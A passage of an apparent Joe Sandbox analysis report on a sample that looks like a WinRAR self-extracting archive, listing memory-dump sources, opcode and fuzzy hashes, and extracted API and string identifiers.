                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: cfd80b8924012b3a81ce264cde7180753b201b1e387c519ebd9873ce58afa85e
                    • Instruction ID: b9ed08bd83f2ef9f61ebaeade8d1e44404dd0abee10e930ba0bb66bb40ab68fc
                    • Opcode Fuzzy Hash: cfd80b8924012b3a81ce264cde7180753b201b1e387c519ebd9873ce58afa85e
                    • Instruction Fuzzy Hash: A6614222B182D049EB01DF70C5016FDBFA1B7197C4B9A8433DE9A57686CA7CE106CBA1
                    Memory Dump Source
                    • Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                    • Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 8137a9b05b05aada6fbcd6bbdda66db02b1ef4637fe403d2df7c72722ebbdea5
                    • Instruction ID: 7522dd5e8ffea35a9ca7df53aa8dacf3c448550dcc0f201a6e788a6df14d4b50
                    • Opcode Fuzzy Hash: 8137a9b05b05aada6fbcd6bbdda66db02b1ef4637fe403d2df7c72722ebbdea5
                    • Instruction Fuzzy Hash: 07515773B181514BE728DF28D0067BDB761FB80B48F868236EB4947A88CE7DE941CB11
                    Memory Dump Source
                    • Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                    • Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 525267a7f117e2089c634eae81b531c40420bccc1aa688f1dd99d62513960580
                    • Instruction ID: 81a873428a3e2f7fa1850eb1f143249602f471f48c3dbe6910bdc2b25fce857c
                    • Opcode Fuzzy Hash: 525267a7f117e2089c634eae81b531c40420bccc1aa688f1dd99d62513960580
                    • Instruction Fuzzy Hash: 8A312AB2A086814BD719EE56D69237EBBD0F784740F45863ADF4A83B41DBBCE045C711
                    Memory Dump Source
                    • Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                    • Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 20052d42666034676028b01d15d2cffdefdd266dec7e2dd0f98b8d8f07818195
                    • Instruction ID: f8ee10cd5ca86a27c3291906415ad315123c0bd76253b87f5dae8df1ed45f73e
                    • Opcode Fuzzy Hash: 20052d42666034676028b01d15d2cffdefdd266dec7e2dd0f98b8d8f07818195
                    • Instruction Fuzzy Hash: 68F06871B182558BDBA4DF29A44372977D0FB08380F84807AE5CD83B04D67C95618F15
                    Memory Dump Source
                    • Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                    • Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: e57e15d0ab639cfe726454a8769b7378f2b682ff734fe90589bfb13db1bf513a
                    • Instruction ID: ceed27931c3d48de90adba8f18020a71730c9cac01609e2775f7b2f794cd0125
                    • Opcode Fuzzy Hash: e57e15d0ab639cfe726454a8769b7378f2b682ff734fe90589bfb13db1bf513a
                    • Instruction Fuzzy Hash: 16A00161908842E0EB48EB10A862671A260FB54301B904072E00D821B89EBCA5618222
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                    • Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd
                    Similarity
                    • API ID: _invalid_parameter_noinfo_noreturn
                    • String ID: :$EFS:$LOGGED_UTILITY_STREAM$:$I30:$INDEX_ALLOCATION$:$TXF_DATA:$LOGGED_UTILITY_STREAM$::$ATTRIBUTE_LIST$::$BITMAP$::$DATA$::$EA$::$EA_INFORMATION$::$FILE_NAME$::$INDEX_ALLOCATION$::$INDEX_ROOT$::$LOGGED_UTILITY_STREAM$::$OBJECT_ID$::$REPARSE_POINT
                    • API String ID: 3668304517-727060406
                    • Opcode ID: 036f0b4177b3bd4acf8be137eac01bdc749329f6e627dd372102b0288b9b6631
                    • Instruction ID: 6022a3a33942d07afcc4b7364bed10592f3f04eff9ba9ee8de685a68db3940ed
                    • Opcode Fuzzy Hash: 036f0b4177b3bd4acf8be137eac01bdc749329f6e627dd372102b0288b9b6631
                    • Instruction Fuzzy Hash: 7A41E836B05F0599EB00EF64E8423E973A5EB48798F800137DA4D43759EFB8D665C352
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                    • Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd
                    Similarity
                    • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                    • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                    • API String ID: 2565136772-3242537097
                    • Opcode ID: 6e1e709f092c3aabc6fb1c9db3d7c09c3ef1a4a7bf2af41e7ac9402dec2f511f
                    • Instruction ID: d3b6114b063df791573eab2bc2a3a70f35282c5ac33b0599804cae0f78e39ada
                    • Opcode Fuzzy Hash: 6e1e709f092c3aabc6fb1c9db3d7c09c3ef1a4a7bf2af41e7ac9402dec2f511f
                    • Instruction Fuzzy Hash: 01213D64F09A0381FF18FB10E857775A3A0BF58782FC44177D84E426A4DEBCA5A58223
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                    • Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd
                    Similarity
                    • API ID: _invalid_parameter_noinfo_noreturn$Xinvalid_argumentstd::_
                    • String ID: DXGIDebug.dll$UNC$\\?\
                    • API String ID: 4097890229-4048004291
                    • Opcode ID: caeda946b173b290eeb0eea351584ffd7bcd35d17f0c3fb79cdbd079912c01be
                    • Instruction ID: e2281178bdbd73c26fa1e88ff94cd0fce912a587725fb13b4098557082758159
                    • Opcode Fuzzy Hash: caeda946b173b290eeb0eea351584ffd7bcd35d17f0c3fb79cdbd079912c01be
                    • Instruction Fuzzy Hash: 9E12E222B08A4280EF10EB64D4422BDA371EB85B98F904537DB6D47BE9DFBCD549C391
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                    • Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd
                    Similarity
                    • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_taskDialog
                    • String ID: GETPASSWORD1$Software\WinRAR SFX
                    • API String ID: 431506467-1315819833
                    • Opcode ID: 100daac0e34165666268f43f408bc6971489d972bf40231fa28c726ba550acfe
                    • Instruction ID: 0144db8bed89cbb1e49a2e808b5fb05ac42b0717b4a2d8c7c387e47fde2809bc
                    • Opcode Fuzzy Hash: 100daac0e34165666268f43f408bc6971489d972bf40231fa28c726ba550acfe
                    • Instruction Fuzzy Hash: 7DB1D062F08B4285FB00EB64D4463ECA372AF85394F808236DE5D26AD9DFBCE555C352
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                    • Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd
                    Similarity
                    • API ID: _invalid_parameter_noinfo
                    • String ID: INF$NAN$NAN(IND)$NAN(SNAN)$inf$nan$nan(ind)$nan(snan)
                    • API String ID: 3215553584-2617248754
                    • Opcode ID: ca8329083cbd7a022b2adefca7a3bb58d0ae1dff90efa4c28dbe4d3f14657870
                    • Instruction ID: 6ed105c9d3cb224326305db8278a1c2c1fccc1c14afda96d4a8fec1759b5ff36
                    • Opcode Fuzzy Hash: ca8329083cbd7a022b2adefca7a3bb58d0ae1dff90efa4c28dbe4d3f14657870
                    • Instruction Fuzzy Hash: 3941BE72E09B4589EB04DF25E8427ED73A8EB18398F80853AEE4C47B58DE7CD125C355
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                    • Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd
                    Similarity
                    • API ID: Window$ButtonCheckedObject$ClassDeleteLongName
                    • String ID: STATIC
                    • API String ID: 781704138-1882779555
                    • Opcode ID: 028936735c5caa7e1c5955390d3996a5d13f8d6e72d7f98742e6e6c768b0ab82
                    • Instruction ID: 51489b475340be332228550cf13ae27cbe2760b688ba44689a4d4e0b77d964fa
                    • Opcode Fuzzy Hash: 028936735c5caa7e1c5955390d3996a5d13f8d6e72d7f98742e6e6c768b0ab82
                    • Instruction Fuzzy Hash: C731E621B0864286FB61FB11E5167FAA391BF88BD5F810132ED4D07B45DEBCE4468761
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                    • Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd
                    Similarity
                    • API ID: _invalid_parameter_noinfo_noreturn$AllocGlobal
                    • String ID: </html>$<html>$<html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"></head>$<style>body{font-family:"Arial";font-size:12;}</style>
                    • API String ID: 2721297748-1533471033
                    • Opcode ID: 31d7dc5894d1c9fa85229d9e77b41a308ef747ae09a8312bf4b27f03762016a6
                    • Instruction ID: 6d81b33f105f386321a00936746b611d4aa9ec861db7f1755cd0d90cd49f891d
                    • Opcode Fuzzy Hash: 31d7dc5894d1c9fa85229d9e77b41a308ef747ae09a8312bf4b27f03762016a6
                    • Instruction Fuzzy Hash: 0C81D662F08A0295FB04EBB5D4423ECA372AF48798F804237DE1D576D9DEB8D506C361
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                    • Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd
                    Similarity
                    • API ID: Item$Text
                    • String ID: LICENSEDLG
                    • API String ID: 1601838975-2177901306
                    • Opcode ID: 35fefc179f922e98870b8a3b257cf5e504c5ed53f195972dc606f5139ed8380b
                    • Instruction ID: 3c81f2f65bcf1395e8754eb84867623de26ad171c749e8f76a2957f8cdbc3975
                    • Opcode Fuzzy Hash: 35fefc179f922e98870b8a3b257cf5e504c5ed53f195972dc606f5139ed8380b
                    • Instruction Fuzzy Hash: 57418F25B0861282FB14EB11E8167B9E3A1BF85F85F854176ED4E03B95CFBCE545C322
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                    • Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd
                    Similarity
                    • API ID: AddressProc$CurrentDirectoryProcessSystem
                    • String ID: Crypt32.dll$CryptProtectMemory$CryptProtectMemory failed$CryptUnprotectMemory$CryptUnprotectMemory failed
                    • API String ID: 2915667086-2207617598
                    • Opcode ID: d2e93635ec338890dfe438c4789fcaf7e26687fbfe6c7ce53d5981307f2d6baa
                    • Instruction ID: 75fc2bcbf18022d189ac23ecd2a1af105c4a4c5336e44795b79b7e1c93f27f82
                    • Opcode Fuzzy Hash: d2e93635ec338890dfe438c4789fcaf7e26687fbfe6c7ce53d5981307f2d6baa
                    • Instruction Fuzzy Hash: EB316D20F09B0280EB14EB15A852776A3A1BF48BD1F954537E98E433A8DFFCE551C362
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                    • Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd
                    Similarity
                    • API ID: _invalid_parameter_noinfo_noreturn
                    • String ID: $
                    • API String ID: 3668304517-227171996
                    • Opcode ID: 7957b1f7c23d8b99e8b957fd2374c8a83d1170bc9397b993806739df2f8497c6
                    • Instruction ID: d60e983703f63ebb2c389b4cccf7cd580ef09ba94fd27c09fe365fb41cae36d4
                    • Opcode Fuzzy Hash: 7957b1f7c23d8b99e8b957fd2374c8a83d1170bc9397b993806739df2f8497c6
                    • Instruction Fuzzy Hash: 7DF1D462F1474684EF05EB68D4463BCA361AB84B98F905232CA5D137D9DFBCE0E0C362
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                    • Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd
                    Similarity
                    • API ID: Is_bad_exception_allowedabortstd::bad_alloc::bad_alloc
                    • String ID: csm$csm$csm
                    • API String ID: 2940173790-393685449
                    • Opcode ID: 65edb01f61f21fff02eaccc9a46b43a233fa456fccf40e480b66f774ee54b1a7
                    • Instruction ID: a2ef8ae8344adafdf620cef41feeb5daa7aa45cd7eb292c2e8618dcfcdd5c889
                    • Opcode Fuzzy Hash: 65edb01f61f21fff02eaccc9a46b43a233fa456fccf40e480b66f774ee54b1a7
                    • Instruction Fuzzy Hash: CEE1E776D087828AE714EF34D4823ADB7A0FB45789F948236DA4E87655CF78E481C712
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                    • Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd
                    Similarity
                    • API ID: AllocClearStringVariant
                    • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
                    • API String ID: 1959693985-3505469590
                    • Opcode ID: a8b35b7bcd37d82ee4aaa20c3b876beaab518b1de9e1ce59ea14af8b32f1fe8d
                    • Instruction ID: f140659b45536fa1215fac8e1bfc81dc7944e955e93cff0c71bdbba99a9fc1b2
                    • Opcode Fuzzy Hash: a8b35b7bcd37d82ee4aaa20c3b876beaab518b1de9e1ce59ea14af8b32f1fe8d
                    • Instruction Fuzzy Hash: 83716E76B14B0586EB10EF25D8812ADB7B0FB88B98B801133EA4E47B68CF7CD154C351
                    APIs
                    • LoadLibraryExW.KERNEL32(?,?,00000000,00007FF7E1DE74F3,?,?,?,00007FF7E1DE525E,?,?,?,00007FF7E1DE5219), ref: 00007FF7E1DE7371
                    • GetLastError.KERNEL32(?,?,00000000,00007FF7E1DE74F3,?,?,?,00007FF7E1DE525E,?,?,?,00007FF7E1DE5219), ref: 00007FF7E1DE737F
                    • LoadLibraryExW.KERNEL32(?,?,00000000,00007FF7E1DE74F3,?,?,?,00007FF7E1DE525E,?,?,?,00007FF7E1DE5219), ref: 00007FF7E1DE73A9
                    • FreeLibrary.KERNEL32(?,?,00000000,00007FF7E1DE74F3,?,?,?,00007FF7E1DE525E,?,?,?,00007FF7E1DE5219), ref: 00007FF7E1DE73EF
                    • GetProcAddress.KERNEL32(?,?,00000000,00007FF7E1DE74F3,?,?,?,00007FF7E1DE525E,?,?,?,00007FF7E1DE5219), ref: 00007FF7E1DE73FB
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                    • Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd
                    Similarity
                    • API ID: Library$Load$AddressErrorFreeLastProc
                    • String ID: api-ms-
                    • API String ID: 2559590344-2084034818
                    • Opcode ID: eedfc97f7024c66fbeb39a7219499b253e22696fd1fdab2c5f769bf1fd383016
                    • Instruction ID: f9ad0f257f7386ec26b8b16470437af59eade0bd73d8cc01fcff8f83b411e8f3
                    • Opcode Fuzzy Hash: eedfc97f7024c66fbeb39a7219499b253e22696fd1fdab2c5f769bf1fd383016
                    • Instruction Fuzzy Hash: 3931C731E1A64191EF95FB05A802775A394FF08BB1F998636DD2D87344DFBCE4508362
                    APIs
